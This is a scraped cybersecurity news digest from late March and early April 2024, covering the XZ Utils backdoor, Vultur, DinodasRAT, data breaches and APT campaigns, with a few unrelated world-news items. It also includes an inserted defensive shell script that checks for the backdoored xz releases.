          Over the past year, at least 16 organizations in Russia and one (a ministry) in Serbia have become victims, including state and educational institutions, enterprises of the aviation, rocket-space, and agricultural industries, the military‑industrial and fuel-energy complex, and infosec companies.
          Athena comes loaded with features, such as cross-platform support for Windows, Linux, and OSX, SOCKS5 support, reverse port forwarding, reflective loading of assemblies, modular loading of commands, and much more.
          OilRig attacks
          ESET researchers analyzed a series of new OilRig (aka APT34, Lyceum, Crambus, or Siamesekitten) downloaders that the threat actor used in 2022 campaigns to target organizations in Israel, including a healthcare organization, a manufacturing company, and a local governmental body. The new downloaders, named SampleCheck5000 (SC5k v1-v3), OilCheck, ODAgent, and OilBooster, are notable for using legitimate cloud storage and cloud‑based email services for C2 communications and data exfiltration as a way to hide malicious communication and mask the group’s network infrastructure: Microsoft OneDrive, Exchange Online and Office 365 via Microsoft Graph and Outlook API, as well as Microsoft Office Exchange Web Services (EWS).
          Top organizations were in manufacturing, insurance, technology, and financial services, which received 15%, 9%, 7%, and 6% of the emails, respectively.
          Imperial Kitten/Yellow Liderc/Tortoiseshell attacks
          According to PwC researchers, threat actor Yellow Liderc (aka Imperial Kitten, Tortoiseshell, TA456, and Crimson Sandstorm) has launched watering-hole attacks to distribute IMAPLoader malware, which exploits Windows utilities to identify target systems and deploy additional payloads.
          Observed as a Ransomware-as-a-Service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors since May 2023, and any ransom paid is split between the group and affiliates.
          According to Proofpoint researchers, TA422 used the vulnerabilities as initial access against government, aerospace, education, finance, manufacturing, and technology sector targets likely to either disclose user credentials or initiate follow-on activity.
          At least 20 Russian organizations have been affected, most of which are in the public sector, information technology, space industry and energy sector, but also including construction, transportation, and logistics companies.
          The majority of affected entities are directly involved in defense manufacturing, encompassing radar systems, unmanned aerial vehicles (UAVs), military vehicles, vessels, weaponry, and companies related to the navy.
          APT29/Midnight Blizzard/Nobelium attacks
          Microsoft researchers report that Midnight Blizzard (aka Nobelium) has been using Microsoft Teams chats to target individuals in government, NGOs, IT services, technology, discrete manufacturing, and media sectors.
          The group’s activity began in February 2023 and continued until at least May 2023, stealing sensitive information from manufacturing, IT, and biomedical companies in Taiwan, as well as victims in the U.S., Vietnam, and Pacific Islands.
          Among those compromised were large companies in the field of communications, information security and IT, technology centers, universities and research institutes engaged in advanced developments and technologies, pharmaceutical companies, defense enterprises, and financial organizations.
          CISA alert on CyberAv3ngers attacks
          The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), NSA, EPA, and Israel’s National Cyber Directorate published a joint Cybersecurity Advisory (CSA) on December 14 on the threat actor calling itself CyberAv3ngers responsible for the attack on the Municipal Water Authority of Aliquippa in Pennsylvania.
          Ballistic Bobcat/Charming Kitten attacks
          ESET researchers uncovered a sophisticated cyber-espionage campaign carried out by suspected Iranian-aligned threat actor Ballistic Bobcat (aka APT35, APT42, Charming Kitten, TA453, and PHOSPHORUS).


          New XZ backdoor scanner detects implant in any Linux binary

          Linux
          2024-04-02 https://www.bleepingcomputer.com/news/security/new-xz-backdoor-scanner-detects-implant-in-any-linux-binary/
          Firmware security firm Binarly has released a free online scanner to detect Linux executables impacted by the XZ Utils supply chain attack, tracked as CVE-2024-3094. [...] "

          Autosummary: "It modifies ifunc calls to replace a check "is_arch_extension_supported" which should simply invoke "cpuid" to insert a call to "_get_cpuid" which is exported by the payload object file (i.e., liblzma_la-crc64-fast.o) and which calls malformed _get_cpuid() which is implanted into the code shown in the figure below. "


          Malicious Code in XZ Utils for Linux Systems Enables Remote Code Execution

          Linux
          2024-04-02 https://thehackernews.com/2024/04/malicious-code-in-xz-utils-for-linux.html
          The malicious code inserted into the open-source library XZ Utils, a widely used package present in major Linux distributions, is also capable of facilitating remote code execution, a new analysis has revealed. The audacious supply chain compromise, tracked as CVE-2024-3094 (CVSS score: 10.0), came to light last week when Microsoft engineer and PostgreSQL developer Andres Freund "

          Autosummary: "The most notable part of this supply chain attack is the extreme levels of dedication of the attacker, working more than two years to establish themselves as a legitimate maintainer, offering to pick up work in various OSS projects and committing code across multiple projects in order to avoid detection," JFrog said. "


          China-linked Hackers Deploy New "UNAPIMON" Malware for Stealthy Operations

          exploits
          2024-04-02 https://thehackernews.com/2024/04/china-linked-hackers-deploy-new.html
          A threat activity cluster tracked as Earth Freybug has been observed using a new malware called UNAPIMON to fly under the radar. "Earth Freybug is a cyberthreat group that has been active since at least 2012 that focuses on espionage and financially motivated activities," Trend Micro security researcher Christopher So said in a report published today. "It has been observed to "

          Autosummary: " The cybersecurity firm has described Earth Freybug as a subset within APT41, a China-linked cyber espionage group that's also tracked as Axiom, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti. "


          Winnti's new UNAPIMON tool hides malware from security software

          exploits
          2024-04-02 https://www.bleepingcomputer.com/news/security/winntis-new-unapimon-tool-hides-malware-from-security-software/
          The Chinese "Winnti" hacking group was found using a previously undocumented malware called UNAPIMON to let malicious processes run without being detected. [...] "

          Autosummary: Previously, they have targeted a broad spectrum of organizations, including governments, hardware vendors, software developers, think tanks, telecommunication service providers, and educational institutes. "


          AT&T confirms 73 million people affected by data breach

          financial
          2024-04-02 https://www.malwarebytes.com/blog/news/2024/04/att-confirms-73-million-people-affected-by-data-breach
          Telecommunications giant AT&T has finally confirmed that 73 million current and former customers are caught up in a massive dark web data leak. "

          Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Personal information like names, addresses, phone numbers, passcodes, and social security numbers are prized assets for cybercriminals because they can be used to make scams much more believable. In 2021, a hacker named “Shiny Hunters” put a database apparently containing the personal details of 70 million AT&T customers up for sale, but AT&T denied the leak was its data, and denied it again when the data appeared on the dark web last month. "


          Will Truth Social post a financial bailout for Trump?

          financial
          2024-04-02 https://www.bbc.co.uk/news/business-68716628
          Trump Media lost nearly $60m last year. So how is it worth billions? We explain the ex-president's windfall. "

          Autosummary: It went public in March 2024 via what is known as a SPAC - basically, it was acquired by a company whose shares were already trading publicly on the stock market, in this case, Digital World Acquisition Corp. Mr Trump now owns about 57% of shares in the combined firm, which was renamed Trump Media and trades under the DJT ticker - Mr Trump's initials. The next biggest owner of TMTG is the Kuwaiti-headquartered investment firm ARC Global Investments, which has a 6.9% stake, according to Trump Media filings with financial regulators. Trump Media lost nearly $60m in 2023, while bringing in only about $4m in revenue from advertising, according to its latest financial update, which also warned of "substantial doubt" about its ability to continue as a business. "


          Escalating malware tactics drive global cybercrime epidemic

          exploits industry
          2024-04-01 https://www.helpnetsecurity.com/2024/04/01/q4-2023-malware-rise/

          Evasive, basic, and encrypted malware all increased in Q4 2023, fueling a rise in total malware, according to WatchGuard. Threat actors employ diverse tactics The average malware detections rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific. “The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities … More

          The post Escalating malware tactics drive global cybercrime epidemic appeared first on Help Net Security.

          "

          Autosummary: A malware-as-a-service (MaaS), Glupteba’s malicious capabilities include downloading additional malware, masquerading as a botnet, stealing sensitive information, and mining cryptocurrency with tremendous stealth. "


          How to design and deliver an effective cybersecurity exercise

          ciber
          2024-04-01 https://www.helpnetsecurity.com/2024/04/01/cybersecurity-exercises/

          Armed forces have always utilized war-gaming exercises for battlefield training to prepare for times of conflict. With today’s digital transformation, the same concept is being applied in the form of cybersecurity exercises – tests and simulations based on plausible cyber-attack scenarios and incident response. Cyber exercises press an organization’s ability to detect, investigate, and respond to threats in a timely and secure manner. Well-designed cybersecurity exercises help organizations proactively identify and address vulnerabilities in their … More

          The post How to design and deliver an effective cybersecurity exercise appeared first on Help Net Security.

          "

          Autosummary: For example, a phishing exercise, which can be conducted at any time, has a low resourcing requirement; while red and blue team exercises require one to eight weeks to run, dedicated teams, and access to a live or a test environment. 6. Design a cybersecurity exercise During a cybersecurity exercise, many forms of cyber-attacks, ranging from simple to highly sophisticated, can be simulated.Phishing exercises test employees’ ability to detect fraudulent communications (email, text, phone, web), social engineering attempts, and their ability to respond to successful attacks.They include pieces of information for participants (e.g., indicators of compromise, a customer complaint, a help desk report, a piece of threat intelligence or a SOC alert), as well as key stages of the exercise. "


          Vultur Android Banking Trojan Returns with Upgraded Remote Control Capabilities

          financial exploits
          2024-04-01 https://thehackernews.com/2024/04/vultur-android-banking-trojan-returns.html
          The Android banking trojan known as Vultur has resurfaced with a suite of new features and improved anti-analysis and detection evasion techniques, enabling its operators to remotely interact with a mobile device and harvest sensitive data. "Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted "

          Autosummary: One of the prominent additions to Vultur is the ability to remotely interact with the infected device, including carrying out clicks, scrolls, and swipes, through Android's accessibility services, as well as download, upload, delete, install, and find files. "


          Malicious Apps Caught Secretly Turning Android Phones into Proxies for Cybercriminals

          ciber
          2024-04-01 https://thehackernews.com/2024/04/malicious-apps-caught-secretly-turning.html
          Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store. The findings come from HUMAN's Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user's device into a proxy node without their knowledge. "

          Autosummary: "When a threat actor uses a residential proxy, the traffic from these attacks appears to be coming from different residential IP addresses instead of an IP of a data center or other parts of a threat actor's infrastructure," security researchers said. "


          Indian Government Rescues 250 Citizens Forced into Cybercrime in Cambodia

          government
          2024-04-01 https://thehackernews.com/2024/04/indian-government-rescues-250-citizens.html
          The Indian government said it has rescued and repatriated about 250 citizens in Cambodia who were held captive and coerced into running cyber scams. The Indian nationals "were lured with employment opportunities to that country but were forced to undertake illegal cyber work," the Ministry of External Affairs (MEA) said in a statement, adding it had rescued 75 people in the past three "

          Autosummary: "We had targets and if we didn't meet those, they would not give us food or allow us into our rooms," the individual, identified only as Stephen, was quoted as saying. "


          Detecting Windows-based Malware Through Better Visibility

          exploits
          2024-04-01 https://thehackernews.com/2024/04/detecting-windows-based-malware-through.html
          Despite a plethora of available security solutions, more and more organizations fall victim to Ransomware and other threats. These continued threats aren't just an inconvenience that hurt businesses and end users - they damage the economy, endanger lives, destroy businesses and put national security at risk. But if that wasn’t enough – North Korea appears to be using revenue from cyber "

          Autosummary: Complete inventory of software, patches and browser extensions
          Status & change detection of all scheduled tasks, services/drivers & processes
          Detect unusual behavior such as processes & logins
          Sysmon integration
          Detailed monitoring of every single Active Directory object
          Network, NetFlow & Performance Monitoring
          Log Power: Logs contain a wealth of data that are the foundation for any monitoring effort - especially on the Windows platform, which provides a well-structured logging framework (that can be supercharged with the free Sysmon utility!).
          EventSentry includes a number of features that can detect malware propagation:
          Software inventory helps verify that critical software is up to date
          Anomaly detection can flag unusual access, e.g. logins from previously unknown IP addresses
          Service Monitoring can detect malicious services & drivers
          Syslog & SNMP monitoring can detect failed login attempts to network devices
          Validation Scripts & Patch inventory minimizes vulnerabilities
          Sysmon integration can detect advanced pass-the-hash/ticket attacks
          5. By monitoring scheduled tasks, services, drivers, software, browser extensions, and registry keys, EventSentry makes it more difficult for malware to hide persistence.
          It does this for a variety of purposes:
          Better persistence (the more hosts that are infected, the more difficult it is to remove)
          Additional asset discovery (think data exfiltration, Ransomware)
          Utilizing more helpers for a botnet, mining, etc.
          But what if you could detect many malware attacks holistically with a set of tools that are part of a single solution:
          Highly customizable log monitoring & consolidation with a sophisticated real-time monitoring engine
          Comprehensive validation checks of important security & audit settings in Windows - organized by compliance - provide a solid foundation for defense.
          For example, most SIEMs are unaware of installed software, scheduled tasks, services & drivers - yet that is exactly where a lot of malware slips through.
          Conclusion: Protecting complex network infrastructures - especially Windows - from advanced threats requires a sophisticated defense that goes beyond collecting logs, Antivirus and casual adherence to compliance frameworks. "


          New Vultur malware version includes enhanced remote control and evasion capabilities

          exploits
          2024-04-01 https://securityaffairs.com/161320/malware/vultur-banking-trojan-android.html
          Researchers detected a new version of the Vultur banking trojan for Android with enhanced remote control and evasion capabilities. Researchers from NCC Group discovered a new version of the Vultur banking trojan for Android that includes new enhanced remote control and evasion capabilities. Some of the new features implemented in this variant include the ability […] "

          Autosummary: Some of the new features implemented in this variant include the ability to: Download, upload, delete, install, and find files; Control the infected device using Android Accessibility Services (sending commands to perform scrolls, swipe gestures, clicks, mute/unmute audio, and more); Prevent apps from running; Display a custom notification in the status bar; Disable Keyguard in order to bypass lock screen security measures. "


          OWASP discloses data breach caused by wiki misconfiguration

          financial
          2024-04-01 https://www.bleepingcomputer.com/news/security/owasp-discloses-data-breach-caused-by-wiki-misconfiguration/
          The OWASP Foundation has disclosed a data breach after some members' resumes were exposed online due to a misconfiguration of its old Wiki web server. [...] "

          Autosummary: "The resumes contained names, email addresses, phone numbers, physical addresses, and other personally identifiable information," said OWASP Executive Director Andrew van der Stock. "


          Yacht retailer MarineMax discloses data breach after cyberattack

          financial ciber
          2024-04-01 https://www.bleepingcomputer.com/news/security/yacht-retailer-marinemax-discloses-data-breach-after-cyberattack/
          MarineMax, self-described as one of the world's largest recreational boat and yacht retailers, says attackers stole employee and customer data after breaching its systems in a March cyberattack. [...] "

          Autosummary: The Rhysida ransomware-as-a-service (RaaS) operation emerged almost one year ago, in May 2023, and gained notoriety after breaching the British Library and the Chilean Army (Ejército de Chile). "


          FTC: Americans lost $1.1 billion to impersonation scams in 2023

          financial
          2024-04-01 https://www.bleepingcomputer.com/news/security/ftc-americans-lost-11-billion-to-impersonation-scams-in-2023/
          Impersonation scams in the U.S. exceeded $1.1 billion in losses last year, according to statistics collected by the Federal Trade Commission (FTC), a figure that is three times higher than in 2020. [...] "

          Autosummary: Fake Giveaways, Discounts, or Money to Claim : Scams offer bogus discounts or giveaways from known brands, leading victims to buy gift cards or send money to claim the non-existent offers. "


          Google now blocks spoofed emails for better phishing protection

          financial
          2024-04-01 https://www.bleepingcomputer.com/news/google/google-now-blocks-spoofed-emails-for-better-phishing-protection/
          Google has started automatically blocking emails sent by bulk senders who don"t meet stricter spam thresholds and authenticate their messages as required by new guidelines to strengthen defenses against spam and phishing attacks. [...] "

          Autosummary: "


          2024 State of Malware in Education report: Top 6 cyberthreats facing K-12 and Higher Ed

          exploits government
          2024-04-01 https://www.malwarebytes.com/blog/awareness/2024/04/2024-state-of-malware-in-education-report-top-6-threats-to-k-12-and-higher-ed
          From ransomware to LOTL attacks, the top threats your educational institution needs to be aware of in 2024. "

          Autosummary: "


          OWASP discloses a data breach

          financial
          2024-04-01 https://securityaffairs.com/161371/data-breach/owasp-data-breach.html
          The OWASP Foundation disclosed a data breach that impacted some members due to a misconfiguration of an old Wiki web server. The OWASP Foundation has disclosed a data breach that impacted some of its members. The OWASP (Open Web Application Security Project) Foundation is a nonprofit organization focused on improving the security of software. It […] "

          Autosummary: However, if the information is current, such as containing your mobile phone number, please take the usual precautions when answering unsolicited emails, mail, or phone calls.” concludes the notification. "


          AT&T confirmed that a data breach impacted 73 million customers

          financial
          2024-03-31 https://securityaffairs.com/161244/data-breach/att-confirmed-data-breach-73m-people.html
          AT&T confirmed that a data breach impacted 73 million current and former customers after its data were leaked on a cybercrime forum. In March 2024, more than 70,000,000 records from an unspecified division of AT&T were leaked onto Breached forum, vx-underground researchers reported. The researchers confirmed that the leaked data is legitimate, however, it is […] "

          Autosummary: Regardless, upon review we can confirm the stolen data is legitimate. — vx-underground (@vxunderground) March 17, 2024 The researchers confirmed that the leaked data is legitimate, however, it is still unclear if the information was stolen from a third-party organization linked to AT&T. The seller, who goes online with the moniker MajorNelson, claims that the data was obtained from an unnamed AT&T division by @ShinyHunters in 2021. "


          Where workers are exploited to harvest an everyday ingredient

          exploits
          2024-03-31 https://www.bbc.co.uk/news/world-latin-america-68369339
          Brazilian workers face degrading conditions to harvest palm wax used in sweets, pills and lipstick. "

          Autosummary: "


          DinodasRAT malware targets Linux servers in espionage campaign

          exploits Linux
          2024-03-31 https://www.bleepingcomputer.com/news/security/dinodasrat-malware-targets-linux-servers-in-espionage-campaign/
          Security researchers have observed Red Hat and Ubuntu systems being attacked by a Linux version of the DinodasRAT (also known as XDealer) that may have been operating since 2022. [...] "

          Autosummary: The malware"s execution logic (Kaspersky) The infected machine is tagged using infection, hardware, and system details and the report is sent to the command and control (C2) server to manage victim hosts. "


          Eight Chinese migrants found dead on Mexico beach

          latam
          2024-03-31 https://www.bbc.co.uk/news/world-us-canada-68703354
          The group were in a boat that capsized along a route used by people trying to reach the US. "

          Autosummary: "


          XZ Utils backdoor update: Which Linux distros are affected and what can you do?

          Linux
          2024-03-31 https://www.helpnetsecurity.com/2024/03/31/xz-backdoored-linux-affected-distros/

          The news that XZ Utils, a compression utility present in most Linux distributions, has been backdoored by a supposedly trusted maintainer rattled the open-source software community on Friday, mere hours before the beginning of a long weekend for many. Nearly two days have passed since then. What do we currently know about the entire affair? The discovery The backdoor was discovered by Andres Freund, a software engineer at Microsoft, when testing some things on … More

          The post XZ Utils backdoor update: Which Linux distros are affected and what can you do? appeared first on Help Net Security.

          "

          Autosummary: XZ Utils was authored by and is still led by Lasse Collin, but the backdoor was introduced by someone that went by “Jia Tan” (JiaT75 on GitHub), who became – over several years, with the help of sock puppet accounts and trust-building via social engineering – a prolific maintainer of the software, and did other things to keep the existence of the backdoor under wraps. Debian maintainers announced that “no Debian stable versions are known to be affected”, but that compromised packages were part of the Debian testing, unstable and experimental distributions, and users of those “are urged to update the xz-utils packages.” "


          DinodasRAT Linux variant targets users worldwide

          Linux
          2024-03-31 https://securityaffairs.com/161255/malware/linux-variant-dinodasrat-backdoor.html
          A Linux variant of the DinodasRAT backdoor used in attacks against users in China, Taiwan, Turkey, and Uzbekistan, researchers from Kaspersky warn. Researchers from Kaspersky uncovered a Linux version of a multi-platform backdoor DinodasRAT that was employed in attacks targeting China, Taiwan, Turkey, and Uzbekistan. DinodasRAT (aka XDealer) is written in C++ and supports a broad range of capabilities to […] "

          Autosummary: Pierluigi Paganini, March 31, 2024. "Instead, hardware-specific information is collected and used to generate a UID, demonstrating that DinodasRAT’s primary use case is to gain and maintain access via Linux servers rather than reconnaissance,” concludes the report. The UID typically includes the date of infection, MD5 hash of the dmidecode command output (a detailed report of the infected system’s hardware), randomly generated number as ID, and backdoor version. "


          Mexico's Ramirez beats Goulamirian to win title

          latam
          2024-03-31 https://www.bbc.co.uk/sport/boxing/68703379
          Mexico's Gilberto Ramirez beats France's Armenia-born world champion Arsen Goulamirian to win the WBA (Super) cruiserweight title. "

          Autosummary: "


          Urgent: Secret Backdoor Found in XZ Utils Library, Impacts Major Linux Distros

          Linux
          2024-03-30 https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
          Red Hat on Friday released an "urgent security alert" warning that two versions of a popular data compression library called XZ Utils (previously LZMA Utils) have been backdoored with malicious code designed to allow unauthorized remote access. The software supply chain compromise, tracked as CVE-2024-3094, has a CVSS score of 10.0, indicating maximum severity. It impacts XZ Utils "

          Autosummary: "


          Girl's death sparks deadly mob violence in Mexico

          latam
          2024-03-30 https://www.bbc.co.uk/news/world-latin-america-68697414
          The killing of Camila Gómez triggered protests and a lynch mob in the southern city of Taxco. "

          Autosummary: "


          Hackers Target macOS Users with Malicious Ads Spreading Stealer Malware

          exploits
          2024-03-30 https://thehackernews.com/2024/03/hackers-target-macos-users-with.html
          Malicious ads and bogus websites are acting as a conduit to deliver two different stealer malware, including Atomic Stealer, targeting Apple macOS users. The ongoing infostealer attacks targeting macOS users may have adopted different methods to compromise victims" Macs, but operate with the end goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday. One "

          Autosummary: "Interestingly, the malicious website cannot be accessed directly, as it returns an error," security researchers Jaron Bradley, Ferdous Saljooki, and Maggie Zirnhelt said. "


          Peru president's home raided in Rolex probe

          latam
          2024-03-30 https://www.bbc.co.uk/news/world-latin-america-68697854
          Authorities searched for a collection of Rolex watches Dina Boluarte allegedly had not declared. "

          Autosummary: "


          Vultur banking malware for Android poses as McAfee Security app

          financial exploits
          2024-03-30 https://www.bleepingcomputer.com/news/security/vultur-banking-malware-for-android-poses-as-mcafee-security-app/
          Security researchers found a new version of the Vultur banking trojan for Android that includes more advanced remote control capabilities and an improved evasion mechanism. [...] "

          Autosummary: Vultur's infection chain (Fox-IT) New capabilities The latest version of Vultur malware that researchers analyzed keeps several key features from older iterations, such as screen recording, keylogging, and remote access via AlphaVNC and ngrok, allowing attackers real-time monitoring and control. "


          Expert found a backdoor in XZ tools used by many Linux distributions

          Linux
          2024-03-30 https://securityaffairs.com/161224/malware/backdoor-xz-tools-linux-distros.html
          Red Hat warns of a backdoor in XZ Utils data compression tools and libraries in Fedora development and experimental versions. Red Hat urges users to immediately stop using systems running Fedora development and experimental versions because of a backdoor in the latest versions of the “xz” tools and libraries. Red Hat Information Risk and Security and Red […] "

          Autosummary: Compromised packages were part of the Debian testing, unstable and experimental distributions, with versions ranging from 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1,” reads the advisory. "
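          The first thing a defender does after reading the two XZ Utils items above (the Help Net Security "which distros are affected" piece and the Security Affairs note on the Debian version range) is check which xz release is installed and whether sshd would load that liblzma. The script below is an added example, not code from either article, from Red Hat, Debian or the XZ Utils project. It hard-codes 5.6.0 and 5.6.1 as the backdoored upstream releases named in Red Hat's alert, and looks at sshd's liblzma because the implant was reached through sshd's (indirect) liblzma dependency, a detail that is common knowledge from the disclosure but not stated on this page. The function names are mine, and the version strings passed in the comments are constructed sample input.

```shell
#!/bin/sh
# Added example: flag the XZ Utils releases that shipped the CVE-2024-3094 backdoor.
# Assumptions (not from the page): only upstream 5.6.0 and 5.6.1 are treated as
# backdoored; distro package revisions such as Debian's 5.5.1alpha-0.1 .. 5.6.1-1
# are not compared here, use the package manager's advisory for those.

# xz_version_affected "xz (XZ Utils) 5.6.1"  -> returns 0 (affected)
# xz_version_affected "xz (XZ Utils) 5.4.6"  -> returns 1 (not a known-bad release)
# Only the first line of "xz --version" output is inspected; its last field is the
# version number. Extra lines (liblzma version) are ignored on purpose.
xz_version_affected() {
    ver=$(printf '%s\n' "$1" | awk 'NR == 1 { print $NF }')
    case "$ver" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Returns 0 when the xz binary on PATH reports a backdoored release, 1 otherwise
# (including when xz is not installed at all).
check_installed_xz() {
    command -v xz >/dev/null 2>&1 || return 1
    xz_version_affected "$(xz --version 2>/dev/null | head -n 1)"
}

# Prints the resolved liblzma path that sshd would load, or nothing if sshd is
# absent. ldd runs the dynamic loader, so on a host you already distrust prefer
# inspecting the binary offline; here it mirrors the check used during disclosure.
sshd_liblzma() {
    sshd_path=$(command -v sshd 2>/dev/null) || return 1
    ldd "$sshd_path" 2>/dev/null | awk '/liblzma/ { print $3 }'
}

main() {
    if check_installed_xz; then
        echo "WARNING: installed xz is a backdoored release (CVE-2024-3094); roll back per your distro advisory"
    else
        echo "installed xz is not 5.6.0/5.6.1 (or xz is absent)"
    fi
    lib=$(sshd_liblzma || true)
    if [ -n "$lib" ]; then
        echo "sshd resolves liblzma to: $lib"
    fi
}

main "$@"
```

          Two caveats a practitioner should keep in mind: a version-string match only catches the two known-bad release numbers, so a rebuilt or renamed binary passes silently (that is the gap Binarly's scanner above addresses by looking for the implant itself), and on Debian-family systems the affected range is expressed as package versions, so `dpkg -l xz-utils liblzma5` against the advisory's range is the authoritative check there.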


          AI abuse and misinformation campaigns threaten financial institutions

          financial
          2024-03-29 https://www.helpnetsecurity.com/2024/03/29/financial-firms-cyberthreats/

          Though generative AI offers financial firms remarkable business and cybersecurity utility, cyberthreats relating to GenAI in financial services are a consistent concern, according to FS-ISAC. Cybercriminals exploit AI for data exfiltration The cybersecurity community’s current consensus is that adversarial usage primarily relates to the creation of convincing phishing lures at scale. That said, threat actors can use generative AI to write malware and more skilled cybercriminals could exfiltrate information from or inject contaminated data into … More

          The post AI abuse and misinformation campaigns threaten financial institutions appeared first on Help Net Security.

          "

          Autosummary: Zero-day vulnerabilities in the supply chain continue to leave the sector unprotected, as attacks on providers disrupt various systems across the sector, such as those of clearing, trading, payments, and back-office service operations. "


          Advanced cybersecurity strategies boost shareholder returns

          ciber
          2024-03-29 https://www.helpnetsecurity.com/2024/03/29/cybersecurity-board-oversight/

          Companies demonstrating advanced cybersecurity performance generate a shareholder return that is 372% higher than their peers with basic cybersecurity performance, according to a new report from Diligent and Bitsight. Boards under pressure to fortify cyber oversight The escalation in the frequency and severity of cyber incidents has positioned cyber risk as one of the foremost challenges confronting boards. With cyber threats becoming increasingly sophisticated and pervasive, boards are under pressure to effectively address cybersecurity risks … More

          The post Advanced cybersecurity strategies boost shareholder returns appeared first on Help Net Security.

          "

          Autosummary: Specialized risk or audit committees enhance cybersecurity performance The median cybersecurity rating for companies with specialized risk committees is 730, compared to 720 for companies with just audit committees, indicating there is not a significant difference in the ability of the audit committee to oversee cyber risk compared to a specialized risk committee. "


          New Linux Bug Could Lead to User Password Leaks and Clipboard Hijacking

          exploits Linux
          2024-03-29 https://thehackernews.com/2024/03/new-linux-bug-could-lead-to-user.html
Details have emerged about a vulnerability impacting the "wall" command of the util-linux package that could be potentially exploited by a bad actor to leak a user’s password or alter the clipboard on certain Linux distributions. The bug, tracked as CVE-2024-28085, has been codenamed WallEscape by security researcher Skyler Ferrante. It has been described as a case of improper "

          Autosummary: "wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads. "


          TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy

          exploits
          2024-03-29 https://thehackernews.com/2024/03/themoon-botnet-resurfaces-exploiting.html
          A botnet previously considered to be rendered inert has been observed enslaving end-of-life (EoL) small home/small office (SOHO) routers and IoT devices to fuel a criminal proxy service called Faceless. "TheMoon, which emerged in 2014, has been operating quietly while growing to over 40,000 bots from 88 countries in January and February of 2024," the Black Lotus Labs team at Lumen "

Autosummary: That being said, a majority of the bots are used for password spraying and/or data exfiltration, primarily targeting the financial sector, with more than 80% of the infected hosts located in the U.S. Lumen said it first observed the malicious activity in late 2023, the goal being to breach EoL SOHO routers and IoT devices, deploy an updated version of TheMoon, and ultimately enroll the botnet into Faceless. "


          Red Hat warns of backdoor in XZ tools used by most Linux distros

          Linux
          2024-03-29 https://www.bleepingcomputer.com/news/security/red-hat-warns-of-backdoor-in-xz-tools-used-by-most-linux-distros/
          Today, Red Hat warned users to immediately stop using systems running Fedora development and experimental versions because of a backdoor found in the latest XZ Utils data compression tools and libraries. [...] "

Autosummary: Red Hat reverts to XZ 5.4.x in Fedora Beta Red Hat is now tracking this supply chain security issue as CVE-2024-3094, assigned it a 10/10 critical severity score, and reverted to 5.4.x versions of XZ in Fedora 40 beta. "


          Beware! Backdoor found in XZ utilities used by many Linux distros (CVE-2024-3094)

          Linux
          2024-03-29 https://www.helpnetsecurity.com/2024/03/29/cve-2024-3094-linux-backdoor/

          A vulnerability (CVE-2024-3094) in XZ Utils, the XZ format compression utilities included in most Linux distributions, may “enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely,” Red Hat warns. The cause of the vulnerability is actually malicious code present in versions 5.6.0 (released in late February) and 5.6.1 (released on March 9) of the xz libraries, which was accidentally found by Andres Freund, a PostgreSQL developer and … More

          The post Beware! Backdoor found in XZ utilities used by many Linux distros (CVE-2024-3094) appeared first on Help Net Security.

          "

Autosummary: “Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the “fixes” [for errors caused by the injected code in v5.6.0],” Freund commented. “Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by Linux distributions, and where they have, mostly in pre-release versions.” "


          France loves Brazil says Macron after Lula meeting

          latam
          2024-03-29 https://www.bbc.co.uk/news/world-latin-america-68692226
          French and Brazilian presidents share moments of friendship with world during tour of Amazon. "



          Activision: Enable 2FA to secure accounts recently stolen by malware

          exploits
          2024-03-29 https://www.bleepingcomputer.com/news/security/activision-enable-2fa-to-secure-accounts-recently-stolen-by-malware/
          An infostealer malware campaign has reportedly collected millions of logins from users of various gaming websites, including players that use cheats, pay-to-cheat services. [...] "

          Autosummary: "If players believe they may have clicked on a suspicious link or if they want to ensure their account is protected, they can change their password and follow recommended best practices," the company added, referring to two-factor authentication (2FA). "


          Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

          exploits
          2024-03-28 https://securityaffairs.com/161151/security/google-chrome-zero-days-pwn2own-2024.html
          Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during the Pwn2Own Vancouver 2024. Google addressed several vulnerabilities in the Chrome web browser this week, including two zero-day vulnerabilities, tracked as CVE-2024-2886 and CVE-2024-2887, which were demonstrated during the Pwn2Own Vancouver 2024 hacking competition. The high-severity vulnerability CVE-2024-2886 is a […] "

Autosummary: Pierluigi Paganini, March 28, 2024. Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during the Pwn2Own Vancouver 2024. "


          Cybercriminals use cheap and simple infostealers to exfiltrate data

          ciber
          2024-03-28 https://www.helpnetsecurity.com/2024/03/28/identity-based-attacks-rise/

          The rise in identity-based attacks can be attributed to a rapid increase in malware, according to SpyCloud. Researchers found that 61% of data breaches in 2023, involving over 343 million stolen credentials, were infostealer malware-related. Of these compromised identity records, one in four contained information about the user’s network or physical location, putting the individual’s identity, platforms they have access to, and physical well-being at risk. Infostealer malware exposes user information Taking a deeper look … More

          The post Cybercriminals use cheap and simple infostealers to exfiltrate data appeared first on Help Net Security.

          "

